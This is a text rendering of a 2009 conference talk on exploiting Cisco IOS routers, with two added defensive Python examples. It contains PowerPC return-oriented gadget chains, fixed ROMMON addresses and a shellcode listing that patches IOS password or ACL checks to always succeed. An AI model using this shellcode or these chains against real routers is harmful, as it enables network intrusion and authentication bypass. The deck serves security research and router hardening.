
Router Exploitation

Felix 'FX' Lindner


BlackHat Briefings USA
2009
Agenda
- Introduction & Motivation
- Vulnerabilities in routers
- Architectural considerations
- The Return Address Dilemma
- Shellcode for Routers
- Protecting Routers

Watch the BlackHat-O-Meter!



Introduction
- Exploitation of router vulnerabilities has been shown independently before
  - Primary focus on Cisco IOS
- Notable incidents in the wild have not been registered within the security community
  - Successful but unnoticed attacks are unlikely, due to the fragile nature of the target (more on this later)
- All publicized incidents were based on:
  - Configuration issues
  - Insider attacks
  - Trivially exploitable functional vulnerabilities
- The limited data from Recurity Labs CIR Online supports that observation

Motivation
- Everything handling even remotely remote data gets exploited all the time
- It has been established that control over infrastructure equipment is desirable for an attacker
- Therefore, unique obstacles obviously prevent wide-scale & high quality exploitation of routers
- Knowing these obstacles is the way to notice developments in which the same are overcome
  - These developments will herald a new age

=== Vulnerabilities in Routers ===

Vulnerabilities
- There is comparably little public vulnerability research for network equipment
  - In 2008, only 14 vulnerabilities in Cisco IOS published
  - Juniper only reports a memory leak and OpenSSL issues
  - Nothing on Nortel Networks
- Vulnerabilities are often fixed as functional issues and classified accordingly
  - E.g. "malformed packet crashes router"
  - Will not make it into the vulnerability databases
  - Information only accessible to customers

Service Vulnerabilities
- Vulnerabilities in network facing services were the big deal in network leaf nodes (aka servers)
- Routers run network services too
  - Remote administration interfaces
  - SNMP (see CVE-2008-0960)
  - TFTP / FTP / HTTP Services
- Never used in well configured networks
  - Sloppy managed networks don't need router exploits
- Most custom implementations of router services had vulnerabilities in the past
  - Apart from fixes, little changes over versions
  - No new vulnerabilities introduced

Service Vulnerabilities
- Routers expose little functionality to truly remote attackers
- Routing protocols are run "internally"
  - EIGRP / OSPF require multicast access
  - RIP is too simple to be buggy ☺
  - BGP requires explicit peer configuration
  - DTP / VTP / CDP / etc. require local link access
  - ISIS isn't even IP
- Within a multicast domain, routers are at risk
- In the Internet, network engineering principles say: You shall not accept routing information from arbitrary hosts.

Service Vulnerabilities
- A notable exception from the rules: cisco-sa-20070124-crafted-ip-option
- Triggered by:
  - Internet Control Message Protocol (ICMP)
  - Protocol Independent Multicast version 2 (PIMv2)
  - Pragmatic General Multicast (PGM)
  - URL Rendezvous Directory (URD)
- Vulnerability caused by individual parsing code in IOS
  - IP Options parsed after an End-of-Options (0x00) was found
  - Stack based buffer overflow in the attempt to reverse a source route for the generated ICMP reply
- It is not uncommon for routers to get pinged

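As an added example (not from the slides): the advisory above comes down to two parser rules that IOS got wrong, stop at End-of-Options and never trust an option length or source-route pointer. The Python walker below shows the checks a correct IPv4 options parser makes before reversing a source route for a reply. The option bytes are constructed for the demo; the first sample carries a valid LSRR followed by EOL and junk that a parser ignoring EOL would read as an oversized option, the second sample is the same junk without the EOL, which must be rejected instead of copied into a fixed-size buffer.

```python
"""Defensive IPv4 options walker (added example, not IOS code)."""
from dataclasses import dataclass
from typing import List, Optional

IPOPT_EOL = 0      # End-of-Options-List: nothing after it is an option
IPOPT_NOP = 1      # single-byte padding
IPOPT_LSRR = 131   # loose source and record route
IPOPT_SSRR = 137   # strict source and record route


@dataclass
class IPOption:
    kind: int
    data: bytes    # option payload without kind and length bytes


class MalformedOptions(ValueError):
    pass


def parse_ip_options(opts: bytes) -> List[IPOption]:
    """Return the options found before EOL; raise on any bad length field."""
    out: List[IPOption] = []
    i = 0
    while i < len(opts):
        kind = opts[i]
        if kind == IPOPT_EOL:
            break                       # everything after EOL is padding: ignore it
        if kind == IPOPT_NOP:
            i += 1
            continue
        if i + 1 >= len(opts):
            raise MalformedOptions("option %d has no length byte" % kind)
        length = opts[i + 1]
        # length counts the kind and length bytes themselves, so it is at least 2,
        # and the whole option must fit inside the options area
        if length < 2 or i + length > len(opts):
            raise MalformedOptions("option %d length %d out of bounds" % (kind, length))
        out.append(IPOption(kind, opts[i + 2:i + length]))
        i += length
    return out


def reversed_source_route(opt: IPOption) -> Optional[List[bytes]]:
    """Hops of an LSRR/SSRR option in reverse order, or None for other options.

    data[0] is the pointer (offset from option start, 4 = first hop); the rest
    must be whole 4-byte addresses.  A bad pointer or odd length is rejected
    rather than used as a copy length.
    """
    if opt.kind not in (IPOPT_LSRR, IPOPT_SSRR):
        return None
    if len(opt.data) < 1:
        raise MalformedOptions("source route without pointer")
    pointer, route = opt.data[0], opt.data[1:]
    if len(route) % 4 != 0 or len(route) > 36:      # at most 9 hops fit in 40 bytes
        raise MalformedOptions("source route length %d invalid" % len(route))
    if pointer < 4 or pointer > len(route) + 4:      # len+4 means route exhausted
        raise MalformedOptions("source route pointer %d invalid" % pointer)
    hops = [route[j:j + 4] for j in range(0, len(route), 4)]
    return list(reversed(hops))


def is_rejected(opts: bytes) -> bool:
    """True if the options area (or a source route in it) fails validation."""
    try:
        for opt in parse_ip_options(opts):
            reversed_source_route(opt)
        return False
    except MalformedOptions:
        return True


# --- constructed sample inputs --------------------------------------------
# LSRR with two hops (10.0.0.1, 10.0.0.2), then EOL, then junk that a parser
# ignoring EOL would try to interpret as a 255-byte LSRR.
SAMPLE_WITH_TRAILING_JUNK = (
    bytes([IPOPT_LSRR, 11, 4]) + bytes([10, 0, 0, 1]) + bytes([10, 0, 0, 2])
    + bytes([IPOPT_EOL])
    + bytes([IPOPT_LSRR, 0xFF]) + b"\x41" * 20
)
# The same junk without an EOL in front of it: must be rejected, not parsed.
SAMPLE_BAD_LENGTH = bytes([IPOPT_LSRR, 0xFF]) + b"\x41" * 20


def demo() -> List[List[bytes]]:
    """Reverse every source route in the first sample (expect exactly one)."""
    routes = []
    for opt in parse_ip_options(SAMPLE_WITH_TRAILING_JUNK):
        route = reversed_source_route(opt)
        if route is not None:
            routes.append(route)
    return routes


if __name__ == "__main__":
    print(demo())                       # [[b'\n\x00\x00\x02', b'\n\x00\x00\x01']]
    print(is_rejected(SAMPLE_BAD_LENGTH))   # True
```

The parser stops at the EOL byte, so the junk after it is never touched, and the second sample fails on the length check before any copy happens.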
Upcoming Vulnerabilities
- The landscape changes. Routers now support:
  - IPv6
  - VoIP: H.323, H.225.0, H.245.0, SIP
  - Lawful Interception Functionality
  - SSL VPN
  - Web Service Routing
  - XML-PI
  - Web Service Management Agent
- Huawei Quidway access routers come with H.323 services enabled by default
- Luckily, adoption is slow.
  - Network engineers just don't want application level functionality on their devices.

Client Side Vulnerabilities
- Routers are rarely used as clients
- Exceptions are:
  - Telnet / SSH connections into other routers
  - File transfers from / to the router
  - Authentication services (RADIUS, TACACS+)
  - Name resolution (DNS), potentially unintentional
- The new services will change that as well
  - Routers talking to VoIP infrastructure
  - Routers talking to HTTP servers
- Up until now, Client Side doesn't play a role.

Transit Vulnerabilities
- Most powerful: Vulnerabilities triggered by traffic passing through the router
  - Would be really bad if triggered after forwarding
- Most unlikely: Routers try really hard to not look at traffic
  - Inspecting packets is expensive
  - Forwarding should be handled in hardware as much and as often as possible
- Some traffic must be inspected on every hop
  - Source routed packets
  - Hop-by-Hop headers in IPv6
- No true Transit Vulnerability known so far

=== Architectural Considerations ===

OS Architectures Comparison

Product               | OS Design         | Fault Behavior                | Exploitability
----------------------|-------------------|-------------------------------|---------------
Cisco IOS             | Monolithic ELF    | Device Crash                  | Hard
Cisco Service Modules | Linux 2.4 based   | Process Crash / Module Crash  | Interesting
Juniper JUNOS         | FreeBSD 3.x based | Process Crash                 | Probably known
Huawei VRP (1)        | VxWorks 5.x based | Device Crash                  | A little tricky
Huawei VRP (2)        | Linux 2.x based   | Process Crash                 | Known
$DSL_Router           | Linux 2.x based   | Process Crash                 | Known

The Easy Ones
- Router operating systems based on standard UNIX architectures are comparatively easy to exploit
  - Virtual address spaces for every process
  - No fancy protection mechanisms
  - Most things run as UID 0
  - Everything behaves the way attackers know it

The Hard One
- IOS is a single large binary program (ELF) running directly on the main CPU
  - Shared memory architecture
  - Virtual memory mapping according to ELF header
  - CPU (PPC32, MIPS32 or MIPS64) in Supervisor mode
- One single shared Heap
  - Doubly-linked list of memory blocks
- Processes are threads with CPU context and stack block allocated on the heap
  - No virtual memory space
  - Run-to-completion scheduler (like Windows 95)

Consequences of Design
- IOS cannot recover from exceptions
  - Any exception causes the device to restart
- IOS cannot recover from memory corruptions
  - If the heap linked list is corrupted, the device restarts
  - Integrity checks on the heap are performed with every allocation / de-allocation
  - Additional integrity tests are performed by CheckHeaps
- IOS cannot recover from CPU hogs
  - If a process does not return execution to the scheduler, a CPU watchdog restarts the device

IOS Memory Layout
- Memory is laid out based on the image base
- IO memory is laid out based on physical interfaces and configuration

Start      End        Size(b)   Class  Media  Name
0x03C00000 0x03FFFFFF 4194304   Iomem  R/W    iomem
0x60000000 0x60FFFFFF 16777216  Flash  R/O    flash
0x80000000 0x83BFFFFF 62914560  Local  R/W    main
0x8000808C 0x8095B087 9777148   IText  R/O    main:text
0x8095B088 0x80CDBFCB 3673924   IData  R/W    main:data
0x80CDBFCC 0x80DECEE7 1117980   IBss   R/W    main:bss
0x80DECEE8 0x83BFFFFF 48312600  Local  R/W    main:heap

(Slide annotations: iomem and flash have a static address; main and its text/data/bss/heap sub-regions have dependencies.)

The IOS Image Hell
- Every IOS image is built from scratch
- Contents of the build decided by:
  - Platform
  - Major / Minor Version
  - Release Version
  - Train
  - Feature-Set
  - Special Build
- 272722 different IOS Images known to the Cisco Feature Navigator on CCO in June 2009
- Theoretically, this means as many memory layouts

The IOS Image Hell
- For exploitation that means:
  - Assumptions about locations of specific code have a chance of 0.000366% to be correct
  - Assumptions about the start of the Heap are just as good
  - Since Stacks are Heap allocated blocks of memory, correct guesses about the stack location are even less likely
- IOS's build process provides a far higher unpredictability of memory layout than any ASLR technology currently in use!

The IOS Image Hell
- The image diversity is also a problem for shellcode
  - The whole thing is compiled at once
  - The image does not contain any symbols
  - The image does not contain an exported list of functions
  - There is no guarantee that structures are equal between images
    - In fact, it's almost guaranteed that someone at Cisco decided to expand or reorder a structure because they felt like it.
- Use of platform code (what shellcode normally does) is not so easy on IOS.

=== The Return Address Dilemma ===

Where to (re)turn to?
- Stack: it's somewhere in the heap (unpredictable)
- IOS Code: its location depends on the image version
  - You would need to know the image version, which you don't
  - You would need to have a copy of exactly that image, which you don't
- IOS data/rodata/bss sections: location and structure depend on the image version
  - Comparing 1597 images for Cisco 2600, only 24 (1.5%) have a section (.data) at the same address
  - 12.4 images seem to use alignment for sections now
- IOMEM: useless, not executable
- Heap spray: not applicable
  - attacker has rarely any control over the heap
- Partial overwrites are not an option either, as IOS runs on PPC32, MIPS32 and MIPS64 in Big Endian mode

The Current Best Bet
- Cisco routers use a bootstrap loader called ROMMON
  - ROMMON is mapped initially into memory through hardware initialization
  - ROMMON provides a very basic CLI
  - ROMMON provides the initial exception handlers
- ROMMON is mapped at fixed addresses
  - 0xFFF00000 for Cisco 1700
  - 0xFFF00000 for Cisco 2600
  - 0x1FC00000 for Cisco 3640
  - 0x1FC00000 for Cisco 3660

ROMMON Versions
- ROMMON Version distribution is a lot smaller
  - ROMMON is rarely updated
  - Therefore, versions depend on shipping date
  - Cisco prefers bulk sales of devices

[Two charts: "C2600 ROMMON Version Distribution (based on Google searches)" and "ROMMON Version Distribution in a real world network (571 devices)". Legend: Version 11.3(2)XA4, Version 12.1(3r)T1, Version 12.1(3r)T2, Version 12.2(10r)1, Version 12.2(6r), Version 12.2(7r) [cmong 7r], Version 12.2(7r)XM1, Version 12.2(8r) [cmong 8r]]

Return Oriented Programming*
- Chaining together function epilogs before return to gain arbitrary functionality
- One of these hacking techniques that every sufficiently talented hacker with a need came up with independently
- Has been shown to work nicely on IA-32 and SPARC code using an entire glibc
- We have 146556 bytes (36639 instructions) and a PowerPC CPU that returns via LR

* "Return-oriented Programming: Exploitation without Code Injection", Erik Buchanan, Ryan Roemer, Stefan Savage, Hovav Shacham, University of California, San Diego.
  http://www.blackhat.com/presentations/bh-usa-08/Shacham/BH_US_08_Shacham_Return_Oriented_Programming.pdf

Return Oriented on PowerPC

Code (the two gadgets shown on the slide):

    [here be buffer overflow]
    lwz %r0, 0x20+arg_4(%sp)
    mtlr %r0
    lwz %r30, 0x20+var_8(%sp)
    lwz %r31, 0x20+var_4(%sp)
    addi %sp, %sp, 0x20
    blr

    FUNC_02: Memory write!
    stw %r30, 0xAB(%r31)
    lwz %r0, 0x18+arg_4(%sp)
    mtlr %r0
    lwz %r28, 0x18+var_10(%sp)
    lwz %r29, 0x18+var_C(%sp)
    lwz %r30, 0x18+var_8(%sp)
    lwz %r31, 0x18+var_4(%sp)
    addi %sp, %sp, 0x18
    blr

Stack (value | slot, as drawn top to bottom):

    41414141  | Buffer
    41414141  | Buffer
    41414141  | Buffer
    41414141  | Buffer
    VALUE     | saved R30
    DEST.PTR  | saved R31
    41414141  | saved SP
    FUNC_02   | saved LR
    42424242  | saved R28
    42424242  | saved R29
    VALUE2    | saved R30
    DEST.PTR2 | saved R31
    42424242  | saved SP
    FUNC_02   | saved LR
    stuff     |

Too Much Cache
- PowerPC has separate instruction and data caches
- Executing data you just wrote doesn't work

[Diagram: memcpy() writes AAAA…AAAAA through the D-Cache into Memory; after return the CPU fetches instructions through the separate I-Cache]

More Code Reuse
- The Bootstrap code already brings functionality that we need: Disable all caches!
- IOS doesn't care
- But we do!

ROMMON routine as disassembled on the slide:

    stwu %sp, -0x10(%sp)
    mflr %r0
    stw %r31, 0x10+var_4(%sp)
    stw %r0, 0x10+arg_4(%sp)
    bl Disable_Interrupts
    mr %r31, %r3
    mfspr %r0, dc_cst
    cmpwi cr1, %r0, 0
    bge cr1, NoDataCache
    bl Flush_Data_Cache
    bl Unlock_Data_Cache
    bl Disable_Data_Cache
    NoDataCache:
    bl Invalidate_Instruction_Cache
    bl Unlock_Instruction_Cache
    bl Disable_Instruction_Cache
    mfmsr %r0
    rlwinm %r0, %r0, 0,28,25
    mtmsr %r0
    cmpwi cr1, %r31, 0
    beq cr1, InterruptsAreOff
    bl EnableInterrupts
    InterruptsAreOff:
    lwz %r0, 0x10+arg_4(%sp)
    mtlr %r0
    lwz %r31, 0x10+var_4(%sp)
    addi %sp, %sp, 0x10
    blr

Reliable Code Execution

[Flow diagram. Stages: Return oriented Cache Disable; Return oriented memory write; Return oriented memory write; Execute written data (code) via mtctr SP / bctr; Second Stage Code: search for full packet in IO Memory; Run third stage code. Memory map shown alongside: IO Memory (AAAAAAAA…), Exception Vectors, Code Segment, Read-Only Data, Data, STACK, Heap, ROMMON]

Getting away with it
- Reliable code execution is nice, but an attacker needs the device to stay running
  - We can't just keep running our shellcode, remember the Windows 95 scheduler?
- Andy Davis et al have called the TerminateProcess function of IOS
  - Needs the address of this function, which is again image dependent
  - Exactly what is not wanted!
  - Crucial processes should not be terminated
  - IP Options vulnerability exploits "IP Input"

Getting away with it
- Remember the stack layout?
- We search the stack for a stack frame sequence of SP&LR upwards
- Once found, we restore the stack pointer and return to the caller
- This is reliable across images, as the call stack layout does not change dramatically over releases
- This has been shown to be mostly true on other well exploited platforms

Stack layout (value | slot, as on the earlier slide):

    41414141  | Buffer
    41414141  | Buffer
    41414141  | Buffer
    41414141  | Buffer
    VALUE     | saved R30
    DEST.PTR  | saved R31
    41414141  | saved SP
    FUNC_02   | saved LR
              | saved R28
              | saved R29
              | saved R30
              | saved R31
              | saved SP
              | saved LR
    stuff     |

The Downside of ROMMON
- You need to have a copy of the respective ROMMON for disassembly
  - ROMMON updates are available on CCO
  - The interesting (read: old) versions are not
- You cannot remotely fingerprint ROMMON
  - It is unused dormant code
- You still need to know what hardware platform you are dealing with

Alternatives to ROMMON
- What if we could use the same technique, but return into the IOS image code?
- We can remotely fingerprint the IOS image
- But aren't the image addresses all random?
  - Well, that's exactly the question
- Performing an extensive search over multiple IOS images for the same platform
  - Requiring a BLR instruction
  - Requiring LR restore via stack (R1)
  - Requiring write to pointer in R26-R31
  - Requiring single basic block

Code Similarity (4 images)

Address  | c2600-a3jk8s-mz.122-28c | c2600-a3jk8s-mz.122-29b | c2600-a3jk8s-mz.122-37 | c2600-a3jk8s-mz.122-46
---------|-------------------------|-------------------------|------------------------|-----------------------
8001435c | stw r29,36(r30)         | sth r3,18(r31)          | stw r29,36(r30)        | sth r3,18(r31)
80014360 | li r0,36                | stw r27,184(r30)        | li r0,36               | stw r27,184(r30)
80014364 | sth r0,68(r30)          | lwz r9,92(r27)          | sth r0,68(r30)         | lwz r9,92(r27)
80014368 | mr r3,r30               | lhz r0,414(r9)          | mr r3,r30              | lhz r0,414(r9)
8001436c | lwz r0,36(r1)           | sth r0,72(r30)          | lwz r0,36(r1)          | sth r0,72(r30)
80014370 | mtlr r0                 | stw r29,36(r30)         | mtlr r0                | stw r29,36(r30)
80014374 | lwz r27,12(r1)          | li r0,36                | lwz r27,12(r1)         | li r0,36
80014378 | lwz r28,16(r1)          | sth r0,68(r30)          | lwz r28,16(r1)         | sth r0,68(r30)
8001437c | lwz r29,20(r1)          | mr r3,r30               | lwz r29,20(r1)         | mr r3,r30
80014380 | lwz r30,24(r1)          | lwz r0,36(r1)           | lwz r30,24(r1)         | lwz r0,36(r1)
80014384 | lwz r31,28(r1)          | mtlr r0                 | lwz r31,28(r1)         | mtlr r0
80014388 | addi r1,r1,32           | lwz r27,12(r1)          | addi r1,r1,32          | lwz r27,12(r1)
8001438c | blr                     | lwz r28,16(r1)          | blr                    | lwz r28,16(r1)
80014390 |                         | lwz r29,20(r1)          |                        | lwz r29,20(r1)
80014394 |                         | lwz r30,24(r1)          |                        | lwz r30,24(r1)
80014398 |                         | lwz r31,28(r1)          |                        | lwz r31,28(r1)
8001439c |                         | addi r1,r1,32           |                        | addi r1,r1,32
800143a0 |                         | blr                     |                        | blr

Code Similarity (70 images)

The slide shows 16 of the images in 16 columns, all at addresses 8001435c to 800143a0. Every column carries one of the two listings below: images ending in 122-28c and 122-37 carry variant A, images ending in 122-29b and 122-46 carry variant B, for each of the feature sets c2600-a3jk8s-mz, c2600-a3js-mz, c2600-i-mz and c2600-io3-mz.

Address  | Variant A (122-28c, 122-37) | Variant B (122-29b, 122-46)
---------|-----------------------------|----------------------------
8001435c | stw r29,36(r30)             | sth r3,18(r31)
80014360 | li r0,36                    | stw r27,184(r30)
80014364 | sth r0,68(r30)              | lwz r9,92(r27)
80014368 | mr r3,r30                   | lhz r0,414(r9)
8001436c | lwz r0,36(r1)               | sth r0,72(r30)
80014370 | mtlr r0                     | stw r29,36(r30)
80014374 | lwz r27,12(r1)              | li r0,36
80014378 | lwz r28,16(r1)              | sth r0,68(r30)
8001437c | lwz r29,20(r1)              | mr r3,r30
80014380 | lwz r30,24(r1)              | lwz r0,36(r1)
80014384 | lwz r31,28(r1)              | mtlr r0
80014388 | addi r1,r1,32               | lwz r27,12(r1)
8001438c | blr                         | lwz r28,16(r1)
80014390 |                             | lwz r29,20(r1)
80014394 |                             | lwz r30,24(r1)
80014398 |                             | lwz r31,28(r1)
8001439c |                             | addi r1,r1,32
800143a0 |                             | blr

Images in the first block: c2600-a3jk8s-mz.122-28c, c2600-a3jk8s-mz.122-29b, c2600-a3jk8s-mz.122-37, c2600-a3jk8s-mz.122-46, c2600-a3js-mz.122-28c, c2600-a3js-mz.122-29b, c2600-a3js-mz.122-37, c2600-a3js-mz.122-46.
Images in the second block: c2600-i-mz.122-28c, c2600-i-mz.122-29b, c2600-i-mz.122-37, c2600-i-mz.122-46, c2600-io3-mz.122-28c, c2600-io3-mz.122-29b, c2600-io3-mz.122-37, c2600-io3-mz.122-46.

Code Dissimilarity

c2600-a3jk8s-mz.122-28c | c2600-a3jk8s-mz.122-29b
------------------------|------------------------
stw r29,36(r30)         | sth r3,18(r31)
li r0,36                | stw r27,184(r30)
sth r0,68(r30)          | lwz r9,92(r27)
mr r3,r30               | lhz r0,414(r9)
lwz r0,36(r1)           | sth r0,72(r30)
mtlr r0                 | stw r29,36(r30)
lwz r27,12(r1)          | li r0,36
lwz r28,16(r1)          | sth r0,68(r30)
lwz r29,20(r1)          | mr r3,r30
lwz r30,24(r1)          | lwz r0,36(r1)
lwz r31,28(r1)          | mtlr r0
addi r1,r1,32           | lwz r27,12(r1)
blr                     | lwz r28,16(r1)
                        | lwz r29,20(r1)
                        | lwz r30,24(r1)
                        | lwz r31,28(r1)
                        | addi r1,r1,32
                        | blr

Identical Features!

Code Similarity Results

Count | Percent | Address  | Type
------|---------|----------|--------------------------------------------------------------
1597  | 100%    | -        | Cisco 2600 IOS 12.1 – 12.4 with all possible feature sets
326   | 20.4%   | 80009534 | Arbitrary memory write
249   | 15.6%   | 80040990 | Fixed memory write
224   | 14.0%   | 80014360 | Arbitrary memory write
223   | 13.9%   | 80040984 | Fixed memory write
210   | 13.1%   | 80018554 | Memory write with R0

ROMMON vs. Code Similarity

ROMMON                                                | Image Similarity
------------------------------------------------------|------------------------------------------------------
Perfect addresses (no dependencies)                   | Likely addresses (code flow dependencies)
Cache disabling                                       | Cache still an issue
30% chance of success based on in-the-wild data       | 13% - 20% chance of success over all available images
Cannot be fingerprinted                               | Can be fingerprinted

Return Address Dilemma Summary
- The return address is one of the hardest problems in IOS exploitation
- The ROMMON method is reliable
  - Iff you know or guess the ROMMON version
- Code similarity appears to be promising
  - Experiments only had access to 1597 of 5961 images available for Cisco 2610-2613 (26.8%)
  - Work in progress…

=== Shellcode for Routers ===

IOS Shellcode
- Shellcode for PPC32 and MIPS32/64 is big
- In stack overflows, it's easy to cross the heap block boundary and corrupt the heap
  - Heap repairing stack shellcode can be used to temporarily repair the heap until CheckHeaps verifies it or the following heap block's content is used by IOS
  - The stack should stay partially clean, so the return into a caller still works
- Second stage code is almost always required
  - IOMEM base addresses are not stable
  - Searching IOMEM is not reliable yet, but works
  - IOMEM searching will be harder on larger devices

Bind Shellcode
- Shellcode can create or modify VTYs
  - VTYs can be exposed by Telnet, RSH or SSH
  - Such shellcode has been shown before
- To create a VTY, IOS functions must be called
  - Using fixed addresses in the image is (again) not an option
- Alternatively, IOS data structures can be modified
  - Using fixed addresses of the data structure is wrong
  - Using fixed offsets within the data structure is also not reliable, as such offsets change frequently
  - AAA configurations must be observed!

Alternative Shellcode Approach
- Shellcode can modify the actual runtime code instead of using it
- Only a single code point must be identified
  - To cover AAA configurations, a second code point is needed
- Modified runtime image does no longer validate passwords
- Alternative use for the same method is disabling ACL matching
  - Can become tricky when ACLs are used for other purposes than just filtering incoming traffic
- How to find the address of the function?

Disassembling Shellcode
- When searching for code manually, one often follows string references

[Screenshot of a disassembly listing; not recoverable from the extracted text]

Disassembling Shellcode
- Shellcode can do the same:
  1. Find a unique string to determine its address
  2. Find a code sequence of LIS / ADDI loading the address of this string
     - Watch out for variants using the negative equivalent
     - Watch out for variants using ORI instead of ADDI
  3. Go backwards until you find the STWU %SP instruction, marking the beginning of the function
  4. Patch the function to always return TRUE

Disassembling Shellcode

Listing as shown on the slide (left column followed by right column):

    bl .code
    .string "Unique String to look for"
    .byte 0x00
    .byte 0x00
    .code:
    mflr %r3
    lmw %r29,0x0(%r3)
    lis %r3,0x8000
    ori %r3,%r3,0x8000
    mr %r5,%r3
    .find_r29:
    lwz %r4,0x0(%r3)
    cmpw %cr1, %r4, %r29
    bne %cr1, .findnext
    lwz %r4,0x4(%r3)
    cmpw %cr1, %r4, %r30
    bne %cr1, .findnext
    lwz %r4,0x8(%r3)
    cmpw %cr1, %r4, %r31
    beq %cr1, .stringfound
    .findnext:
    addi %r3,%r3,4
    b .find_r29
    # string address is now in R3
    .stringfound:
    lis %r7, 0x3800
    rlwinm %r6, %r3, 16, 16, 31
    andi. %r8, %r3, 0xFFFF
    or %r8, %r8, %r7
    or %r7, %r7, %r6

    .findlis:
    lwz %r4, 0x0(%r5)
    rlwinm %r4, %r4, 0, 0xF81FFFFF
    cmpw %cr1, %r4, %r7
    bne %cr1, .findlisnext
    lwz %r4, 0x4(%r5)
    rlwinm %r4, %r4, 0, 0xF800FFFF
    cmpw %cr1, %r4, %r8
    beq %cr1, .loadfound
    .findlisnext:
    addi %r5, %r5, 4
    b .findlis
    .loadfound:
    xor %r6, %r6, %r6
    ori %r6, %r6, 0x9421
    lhz %r4, 0x0(%r5)
    cmpw %cr1, %r4, %r6
    beq %cr1, .functionFound
    addi %r5, %r5, -4
    b .loadfound
    .functionFound:
    lis %r4, 0x3860
    ori %r4, %r4, 0x0001
    stw %r4, 0x0(%r5)
    addi %r5,%r5,4
    lis %r4, 0x4e80
    ori %r4, %r4, 0x0020
    stw %r4, 0x0(%r5)

Advanced Ideas: TCL Loader
- Later IOS versions include TCL interpreters
  - API exposed to the user
  - Fully featured script interpreter
- Shellcode should be able to instantiate a new TCL interpreter
- Download third stage TCL script from remote location via TFTP (supported by IOS)
  - Potentially modify interpreter to give raw memory access if required
- Christoph Weber's PH-Neutral 0x7d9 talk

Wet Dreams: The IOS Sniffer
- Turning any Cisco IOS router into a full password sniffer is a naïve idea
  - The product line is designed for fast packet forwarding
  - Speed is achieved by doing as much as possible in hardware
  - "Punting" packets to perform DPI is going to kill the router with load
  - Might work on low load access routers
- Lawful Interception code might change this
  - Increasing deployment in carrier networks (Hello Zensursula!)
  - Designed to intercept specific communication
  - Designed to be invisible to the network operator
  - The code is there, no matter if the MIBs are loaded

IOS MITM
- Using IOS as MITM tool has the same general problems as an arbitrary packet sniffer
- Depending on feature-set, however, the functionality might already be there
  - "TCP Intercept" can report TCP SEQ/ACK to a third party
    - Allowing to inject any traffic into the TCP stream
  - DNS code can report TIDs to a third party
    - Allowing to spoof any DNS response
  - Load balancing features can redirect HTTP requests for arbitrary hosts

=== Protecting Routers ===

General Router Protection
- Good luck!
- Prevent traffic destined to any interface of the router itself at all cost
  - Very specific exceptions for network management
  - Don't forget the loopback and tunnel interfaces
  - Don't forget IPv6
- Protect your routing protocol updates with MD5
- Don't run network services on routers
  - HTTP/HTTPS/FTP/TFTP/etc. are out of the question
  - No matter what Cisco says, don't run VoIP services
- Monitor your Service Modules independently

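As an added example (not from the slides, not a Cisco tool): a small Python linter that turns the checklist above into mechanical checks over a saved IOS running-config: exposed services (HTTP, TFTP/FTP, unrestricted SNMP, VoIP features), addressed interfaces (loopbacks and tunnels included) without an inbound IPv4 or IPv6 filter, OSPF areas and BGP neighbors without MD5 authentication, VTY lines without an access-class, and, from the next slide, a missing core-dump destination. The sample config, interface names, ACL names and image file name are constructed; the checks are heuristics on the command syntax named here and not a substitute for reading the configuration.

```python
"""IOS running-config linter for the router protection checklist (added example)."""
import re
from typing import Dict, List, Tuple


def parse_config(config: str) -> Tuple[List[str], Dict[str, List[str]]]:
    """Split a config into its top-level lines and header -> indented body lines."""
    top: List[str] = []
    sections: Dict[str, List[str]] = {}
    current = None
    for raw in config.splitlines():
        if not raw.strip() or raw.startswith("!"):
            continue                      # comments and separators
        if raw.startswith(" ") and current is not None:
            sections[current].append(raw.strip())
        else:
            current = raw.strip()
            top.append(current)
            sections.setdefault(current, [])
    return top, sections


def lint_config(config: str) -> List[str]:
    top, sections = parse_config(config)
    findings: List[str] = []
    # 1. network services that have no business on a router
    for line in top:
        if re.match(r"ip http (secure-)?server$", line):
            findings.append("HTTP server enabled: " + line)
        if line.startswith("tftp-server ") or line == "ftp-server enable":
            findings.append("file transfer service enabled: " + line)
        if re.match(r"snmp-server community \S+ (RO|RW)$", line):
            findings.append("SNMP community without ACL: " + line)
        if line.startswith(("telephony-service", "dial-peer voice", "sip-ua")):
            findings.append("VoIP feature configured: " + line)
    # 2. traffic to the router itself: every addressed interface needs an inbound
    #    filter, loopbacks and tunnels included, for IPv4 and for IPv6
    for header, body in sections.items():
        if not header.startswith("interface "):
            continue
        if any(l.startswith("ip address ") for l in body) and not any(
                l.startswith("ip access-group ") and l.endswith(" in") for l in body):
            findings.append(header + ": IPv4 address without inbound access-group")
        if any(l.startswith(("ipv6 address ", "ipv6 enable")) for l in body) and not any(
                l.startswith("ipv6 traffic-filter ") and l.endswith(" in") for l in body):
            findings.append(header + ": IPv6 enabled without inbound traffic-filter")
    # 3. routing protocol updates must be authenticated
    for header, body in sections.items():
        if header.startswith("router ospf") and not any(
                "authentication message-digest" in l for l in body):
            findings.append(header + ": no area authentication message-digest")
        if header.startswith("router bgp"):
            peers = {l.split()[1] for l in body if l.startswith("neighbor ")}
            with_pw = {l.split()[1] for l in body
                       if l.startswith("neighbor ") and " password " in l}
            for peer in sorted(peers - with_pw):
                findings.append(header + ": neighbor %s without password" % peer)
    # 4. management access only from specific sources
    for header, body in sections.items():
        if header.startswith("line vty") and not any(l.startswith("access-class ") for l in body):
            findings.append(header + ": no access-class")
    # 5. crash evidence: core dumping needs a configured destination
    if not any(line.startswith("exception dump ") for line in top):
        findings.append("core dumping not configured (no 'exception dump')")
    return findings


# constructed sample: an access router that works but is exposed on every point
SAMPLE_CONFIG = """\
!
ip http server
tftp-server flash:c2600-i-mz.bin
snmp-server community public RO
!
interface Loopback0
 ip address 192.0.2.1 255.255.255.255
!
interface FastEthernet0/0
 ip address 198.51.100.1 255.255.255.0
 ip access-group EDGE-IN in
 ipv6 address 2001:db8::1/64
!
router ospf 1
 area 0 authentication message-digest
!
router bgp 65536
 neighbor 198.51.100.2 remote-as 65537
 neighbor 198.51.100.2 password <removed>
 neighbor 198.51.100.3 remote-as 65538
!
line vty 0 4
 login local
!
"""

if __name__ == "__main__":
    for finding in lint_config(SAMPLE_CONFIG):
        print("-", finding)
```

Run against the sample it reports eight findings, one per missed point; a config with a VTY access-class and an `exception dump` destination and nothing else passes clean. The absence of a finding is only as good as the syntax the linter knows, so treat it as a first pass before the manual review.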
Monitor Configs and Crashes
- Use a configuration monitoring tool like RANCID ("Really Awesome New Cisco confIg Differ")
  - Detects manual configuration changes, new interfaces, new tunnels, etc.
  - Data structure modifications are visible in the configuration
  - Check http://www.shrubbery.net/rancid/
- Configure Core Dumping
  - For critical systems, increase Flash memory, so the entire set of core files can be stored locally
